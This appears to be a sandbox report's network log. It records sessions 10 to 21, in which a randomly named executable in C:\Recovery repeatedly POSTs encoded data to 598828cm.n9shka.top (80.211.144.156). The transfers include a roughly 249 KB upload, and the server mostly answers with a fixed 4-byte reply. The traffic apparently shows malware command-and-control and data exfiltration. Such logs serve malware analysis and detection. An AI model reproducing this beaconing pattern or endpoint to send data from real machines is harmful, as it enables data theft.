Sep 14, 2024 12:53:18.972451925 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62776	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:19.499731064 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:19.853044987 CEST	1744	OUT	Data Raw: 56 51 5c 5e 51 43 5a 5b 5e 5e 56 51 56 5e 54 58 57 52 5c 59 57 5e 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQ\^QCZ[^^VQV^TXWR\YW^U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z+5'-="==5?$^81:/^+:+P%*9^##)/&F/%Z-=
Sep 14, 2024 12:53:20.165491104 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:20.365091085 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 58 3e 24 30 10 23 3a 06 54 2b 3c 32 58 3d 32 0c 15 3d 3c 05 5a 2a 34 29 5b 29 3d 02 0b 24 12 30 5e 24 57 3d 14 24 0e 23 57 22 11 2e 5a 0c 1d 23 58 34 30 3a 1e 32 3b 21 03 24 1f 22 5d 23 31 3b 16 26 05 21 59 35 06 3a 5d 3c 16 32 08 29 21 29 53 2a 13 08 0a 2f 2e 2e 53 37 38 23 51 00 10 26 55 32 58 3d 11 36 0e 39 1e 28 31 26 02 25 0b 29 09 25 3b 21 04 25 5e 3d 58 33 55 3f 1f 22 1c 09 12 27 3c 27 58 23 30 39 56 3c 2e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #X>$0#:T+<2X=2=<Z4)[)=$0^$W=$#W".Z#X40:2;!$"]#1;&!Y5:]<2)!)S/..S78#Q&U2X=69(1&%)%;!%^=X3U?"'<'X#09V<.#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62777	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:21.245578051 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:21.602936983 CEST	1008	OUT	Data Raw: 53 54 59 55 51 44 5a 5b 5e 5e 56 51 56 5b 54 52 57 54 5c 54 57 51 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: STYUQDZ[^^VQV[TRWT\TWQU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?)_'>>W5Q#(..!?;'+<2$)7%9_4 *.<&F/%Z-
Sep 14, 2024 12:53:21.913300991 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:22.044972897 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	62778	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:23.928507090 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:24.275871992 CEST	1012	OUT	Data Raw: 56 53 5c 5b 54 48 5a 5e 5e 5e 56 51 56 59 54 5a 57 5f 5c 55 57 59 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\[THZ^^^VQVYTZW_\UWYUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<_$X>U5(Z>-6<7'8^%9 ()%*>49],<&F/%Z-!
Sep 14, 2024 12:53:24.594178915 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:24.724431038 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	62779	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:24.871753931 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:25.227947950 CEST	1012	OUT	Data Raw: 53 57 59 59 51 42 5a 59 5e 5e 56 51 56 5d 54 5f 57 5f 5c 5b 57 5f 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWYYQBZY^^VQV]T_W_\[W_UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]<?)0S#$$](>15[$84')/?9S1# "/&F/%Z-1
Sep 14, 2024 12:53:25.538723946 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:25.674169064 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	62780	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:25.816932917 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:26.172389984 CEST	1748	OUT	Data Raw: 53 57 5c 5e 54 40 5a 59 5e 5e 56 51 56 53 54 5f 57 51 5c 5a 57 5b 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SW\^T@ZY^^VQVST_WQ\ZW[U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z<<&3-2R6'0=>="??';72)<<9'&4#68<&F/%Z-
Sep 14, 2024 12:53:26.508223057 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	62781	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:25.842598915 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:26.196747065 CEST	1012	OUT	Data Raw: 56 54 59 5d 51 44 5a 5f 5e 5e 56 51 56 59 54 53 57 51 5c 54 57 5a 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY]QDZ_^^VQVYTSWQ\TWZU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(Z5X'X"V674[>5Y ]$#':^<9$29)46,<&F/%Z-!
Sep 14, 2024 12:53:26.503853083 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:26.631611109 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	62782	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:27.090694904 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:27.446721077 CEST	1012	OUT	Data Raw: 53 54 59 5b 54 47 5a 58 5e 5e 56 51 56 5e 54 5d 57 51 5c 58 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: STY[TGZX^^VQV^T]WQ\XW_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+,)_'*U5$)=\#?8[$&:4+32)79;<&F/%Z-=
Sep 14, 2024 12:53:27.758785009 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:27.889146090 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	62783	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:28.016199112 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:28.368666887 CEST	1012	OUT	Data Raw: 53 57 59 5c 54 44 5a 58 5e 5e 56 51 56 58 54 58 57 52 5c 5a 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWY\TDZX^^VQVXTXWR\ZWQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<%Z0&V!7)==!Y+3^<%\3_*901970=Y,&F/%Z-%
Sep 14, 2024 12:53:28.684290886 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:28.883975983 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	62784	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:29.085387945 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:29.431091070 CEST	1012	OUT	Data Raw: 56 57 59 5c 51 41 5f 5f 5e 5e 56 51 56 58 54 5a 57 5f 5c 5a 57 5f 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VWY\QA__^^VQVXTZW_\ZW_UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?,-Y3.:R" ]*-2"0^%()':! )Z/&F/%Z-%
Sep 14, 2024 12:53:29.778774977 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	62785	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:29.834629059 CEST	292	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 249380 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:30.181233883 CEST	12360	OUT	Data Raw: 53 57 59 5a 54 49 5f 58 5e 5e 56 51 56 59 54 5d 57 5f 5c 5b 57 5e 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWYZTI_X^^VQVYT]W_\[W^U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+/='X.!48=>!5$\' _%,<3P&\!] 5Y8<&F/%Z-!
Sep 14, 2024 12:53:30.186211109 CEST	6180	OUT	Data Raw: 3d 3d 31 2b 23 28 1c 37 00 20 3e 54 31 3c 5a 24 37 3c 2e 51 0a 00 53 16 00 2c 07 29 31 59 22 04 22 3b 3a 08 29 54 3e 3e 0a 0b 3d 55 0f 38 2d 03 0f 24 00 02 25 23 28 1d 3a 21 0e 11 3e 2c 34 06 23 0a 3d 50 31 00 1a 08 06 20 05 5a 29 3e 00 23 3d 43 Data Ascii: ==1+#(7 >T1<Z$7<.QS,)1Y"";:)T>>=U8-$%#(:!>,4#=P1 Z)>#=C?.!]SV):_>4::^W>Z"=0/?5Y16# X_7;647/':";#>,)F8E:+[T$!(>7CU$04@'^2(V*Z;6-7\02Z4?]="0,'Z2%:U9%%)
Sep 14, 2024 12:53:30.186230898 CEST	1236	OUT	Data Raw: 35 1f 36 59 3f 26 3d 05 0b 37 29 04 25 34 2a 19 24 09 05 58 3a 57 06 02 33 03 57 2a 3f 09 26 14 35 3a 1a 1e 38 0f 37 14 05 2e 2e 3d 3c 1a 48 3e 21 28 1d 2d 13 1c 3d 05 21 03 2d 50 3d 2b 29 3d 0f 5c 32 36 3f 3d 04 3c 38 3e 26 2c 0a 33 3e 01 30 3f Data Ascii: 56Y?&=7)%4$X:W3W?&5:87..=<H>!(-=!-P=+)=\26?=<8>&,3>0?>]?%3:%+X-'0_=&(\(&2;U;28\B!?<>(2%7Y]53+2< ST)$;' ^3$^,>=![<:6.6/<=Z4<!2=8Q4!9Y=6T,2<"5><$=#!'Y"!R%8*6UW2Z=:399<
Sep 14, 2024 12:53:30.186252117 CEST	2472	OUT	Data Raw: 3a 0b 15 5c 32 3a 59 08 3b 2e 13 12 25 5c 1b 18 2a 57 14 09 3d 59 03 34 33 04 0f 1a 0a 3d 3f 55 31 10 1b 12 32 3d 26 1c 3c 08 3e 24 05 33 3e 02 39 24 29 2b 3d 01 25 20 32 07 0f 59 3c 21 2c 22 0e 30 20 2a 25 5b 38 1f 3e 32 2e 33 33 2e 53 3d 00 31 Data Ascii: :\2:Y;.%\W=Y43=?U12=&<>$3>9$)+=% 2Y<!,"0 %[8>2.33.S=14>.=@726:?W)==^')=>3<-X-5]0?;=,)0>5:<,$$%/_,:$4!&X6(@8Y_98&T& \!3Z7 ,(0,0+//%^05<3 Z3=*_<0+,04< "-R';";
Sep 14, 2024 12:53:30.186369896 CEST	4944	OUT	Data Raw: 22 2c 0a 1b 22 39 0b 5d 3e 23 18 2d 36 33 0d 58 30 3f 5f 19 33 55 0d 17 31 08 0e 5b 28 37 58 06 09 5d 15 55 04 2c 52 3d 2a 23 25 28 32 02 2c 5b 33 1b 26 31 05 2c 53 10 08 3d 0d 16 3a 23 00 1f 09 26 0a 14 21 20 17 19 3d 23 30 07 34 32 39 06 3a 07 Data Ascii: ","9]>#-63X0?_3U1[(7X]U,R=#%(2,[3&1,S=:#&! =#0429:)?$&1$?%(=)P62[5-6R=8R(/-)2:55+Y?B!']2\?8"<1:# /'X3>'0+=7V[U&?AT W%$)""3-#]%>&."7:U&<=5742Z5,8<;$<; ];]0^1;
Sep 14, 2024 12:53:30.186460972 CEST	7416	OUT	Data Raw: 3a 16 0b 3b 39 0f 35 2f 08 30 3b 5c 27 2a 3e 27 0e 00 52 01 13 5e 14 51 06 32 10 52 31 07 03 03 30 3c 0f 52 38 28 1e 51 36 03 25 0e 0a 32 3a 5c 3d 0f 18 15 06 22 14 25 08 35 21 28 39 28 03 2f 38 3b 2a 03 3f 32 2f 59 22 30 24 31 3f 3b 57 00 3b 0d Data Ascii: :;95/0;\'>'R^Q2R10<R8(Q6%2:\="%5!(9(/8;?2/Y"0$1?;W;W\$>/45U%CAH:)7\=&7:899?]:=](%U+<?Y=8S7;>-]<];80?(4&;4U,B5/9Q\)U787;"()6V_/7'867/5$!%Z<B"740+=3>=0
Sep 14, 2024 12:53:30.186500072 CEST	2472	OUT	Data Raw: 0b 56 02 05 0f 22 13 26 38 2a 0f 1c 27 0e 52 59 38 21 0a 02 0c 27 21 1f 22 5a 3d 21 15 2b 3d 18 35 30 5d 17 29 2d 29 1f 05 3d 0b 13 23 05 05 11 32 02 17 11 25 2d 18 1d 39 24 22 2b 34 2d 25 10 32 24 31 05 08 15 3d 32 3c 06 2a 3f 3d 20 1a 1d 0d 1c Data Ascii: V"&8'RY8!'!"Z=!+=50])-)=#2%-9$"+4-%2$1=2<?= /3 >>'1;$-0U4)2":($8W:\"%?)':!!\-%9>)UU9/0>;=1!9:;$;+>1_6\<:1:>?,9!F:(;6]6W:==#=2Z1A3;:8331^1?30%),Q%Z
Sep 14, 2024 12:53:30.191173077 CEST	4944	OUT	Data Raw: 01 38 02 30 3b 04 08 06 38 32 22 18 05 3a 21 1e 08 3c 02 28 21 3b 50 15 06 57 32 3d 29 2d 28 13 04 3d 34 1b 34 55 5a 19 04 21 1a 19 35 40 0a 1d 38 5c 3f 31 30 06 00 5a 3e 1c 25 03 3e 3e 30 03 3d 27 04 21 32 02 2c 2a 08 06 3b 04 08 20 22 5d 30 2b Data Ascii: 80;82":!<(!;PW2=)-(=44UZ!5@8\?10Z>%>>0='!2,; "]0+Y-'V[=W1+5$831. T%+2%1]%99P32[6R!>/3[V29;6:U4=:=$498:.<U .=->::6#,]@V'\<T-':9W>*\!)>2!.=<V+:'Z-R7%3,
Sep 14, 2024 12:53:30.191216946 CEST	4944	OUT	Data Raw: 27 37 28 20 08 3e 0b 35 3e 23 38 00 3f 57 5a 2a 3c 3a 0b 5b 39 2d 3e 58 39 21 06 05 3e 04 1f 59 21 59 1f 27 23 2b 14 21 37 0e 5d 28 04 13 3d 29 3b 2f 39 33 25 59 1a 2e 34 04 29 52 3f 59 3e 10 24 52 3a 0a 35 36 54 13 09 1b 29 17 25 3b 29 39 0e 01 Data Ascii: '7( >5>#8?WZ<:[9->X9!>Y!Y'#+!7](=);/93%Y.4)R?Y>$R:56T)%;)9="_X'<%/7?9+24,T:>BS8R?U5=+6S_Z]S;Z["-T\>&\7Z:Z$,144!Y:(\47%6. "A0^)##6)Y&W>>2T[2 \>(X3@P^9&1=15=W)2B)
Sep 14, 2024 12:53:30.191260099 CEST	2472	OUT	Data Raw: 26 5c 59 14 3e 09 20 1a 0c 20 3f 5a 27 05 34 26 3e 31 22 3b 04 29 2c 2e 01 33 0e 14 32 32 3e 2a 28 26 3b 25 3a 07 24 16 11 33 17 00 08 5c 2a 0f 27 03 21 00 21 39 00 0a 3d 05 00 38 3b 02 3a 27 3d 09 36 39 04 5a 3a 28 3c 13 52 0c 0f 26 23 21 33 02 Data Ascii: &\Y> ?Z'4&>1";),.322>(&;%:$3\'!!9=8;:'=69Z:(<R&#!3=#.H_+>19,?=: >;3]93#C;";>>20/0;C2]U,&&/%9)TQ0.1;/><8*4R3-+2/$W(,<&"#35<+!]#"&TK;=Y Z-="6/WQ>F31W=Z0Z515
Sep 14, 2024 12:53:30.528381109 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:31.270220041 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	62786	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:30.043514013 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:30.399857998 CEST	1012	OUT	Data Raw: 56 50 59 5e 54 41 5f 5b 5e 5e 56 51 56 52 54 5e 57 52 5c 59 57 5f 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VPY^TA_[^^VQVRT^WR\YW_UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,0X&R!)>^!Y;0(,\':(')!\ 3"8&F/%Z-
Sep 14, 2024 12:53:30.713251114 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:30.840540886 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	62787	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:30.965416908 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue
